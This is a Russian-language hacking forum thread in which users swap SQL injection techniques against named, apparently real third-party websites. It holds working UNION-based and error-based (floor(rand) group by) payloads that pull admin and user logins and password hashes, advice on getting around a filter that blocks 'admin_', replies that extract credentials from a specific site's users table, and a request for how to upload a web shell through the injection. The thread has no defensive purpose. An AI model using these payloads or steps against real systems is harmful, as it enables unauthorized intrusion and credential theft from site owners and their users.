Есть простенькая SQL-иньекция, но сайт фильтрует(и сразу банит айпишник) все урлы, в которых проскакивает слово "admin_". Т.е. запрос Code: http://site.com/index.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user,pass),3+from+[B]admin_[/B]users/* фильтруется. Остальные запросы идут без проблем. Идеи, как обойти? Через POST скрипт параметры не берет.
спасибо, я вот хотел изнать названия колонок при помощи information_shema но там написано што такой процес запрещон, а што дальше в таком случае я могу сделать? и дайте плиз ссылку на нормальную статью о там как при скуле залить шелл
клац уже милионный раз перемалывается этот вопрос, поиcком можете научится пользоватся? здец просто полнeйший..обленилась молодежь
Кто знает как юзать вложенные запросы в мускул 4?) Т.е имеем запрос /**/or/**/1/**/group/**/by/**/concat(version(),floor(rand(0)*2))having/**/min(0)/**/or/**/1/* все норм,Версию выведет,но попытаемся выдрать данные из существующей таблы admin допустим,летит эррор ЗЫ:Интересно не мне одному
Помогите определить версию БД. http://www.procasapanama.com/detalle.php?id=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
Помогите найти: 1)Кол-во таблиц 2)пароль админа http://www.alestilocuquita.com/descripcion.php?id=-347'+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+count(*)+from+INFORMATION_SCHEMA.TABLES+limit+1,1),1,64),floor(rand(0)*2)))z)+--+
FlaktW http://www.alestilocuquita.com/descripcion.php?id=-347' and(select 1 from(select count(*),concat((select (select (SELECT concat_ws(0x3a,usuarios.usuario,usuarios.clave) FROM `orlando_cuiquita`.usuarios LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1 Дальше перебирай лимитом юзверов
Можно ли что то сделать в таких случаях http://www.omelhordamoda.com.br/modafeminina.asp?CatID=80%27 http://www.siliconaction.com.br/registro/secao.mv?nomearquivo=[] http://rasta.com.br/loja/index.php?page=shop.product_details%27&flypagep[]=shop.flypage%27&product_id=4685%27&category_id=8%27&manufacturer_id=0%27&option=com_virtuemart&Itemid=1%27
[Ozzi] В первом случае - скуля http://www.omelhordamoda.com.br/modafeminina.asp?CatID=1' БД - MSAccess Вот статья про эту субд https://forum.antichat.ru/threadnav50550-1.html А в остальных 2ух просто раскрытие я так понял. Нет,нельзя.Апдейт встречается довольно редко,также как и обход авторизации.
Как переделать этот запрос ' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) -- так что б он вывел table_name из information_schema
' or 1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
Делаю такой запрос Code: select column_name from information_schema.columns where table_name='User' мне выдает там 5 значенй логин пароль и тд , делаю дальше так Code: select логин from User - меня бросает на главную страницу почему?
Проверьте количество записей: Code: select count(*) from User Потом проверь, в какой базе таблица: Code: select table_schema from information_schema.tables where table_name='User' Потом запросом: Code: select password from table_schema.User - Выводи данные Линк скинь.
причин может быть несколько, мб таблица в другой базе, тогда вопрос будет фелс, и будет редирект возможно что там фильтр на определенные слова.. а еще много чего возможно,.. анализируй сайт смотри на какие слова ругается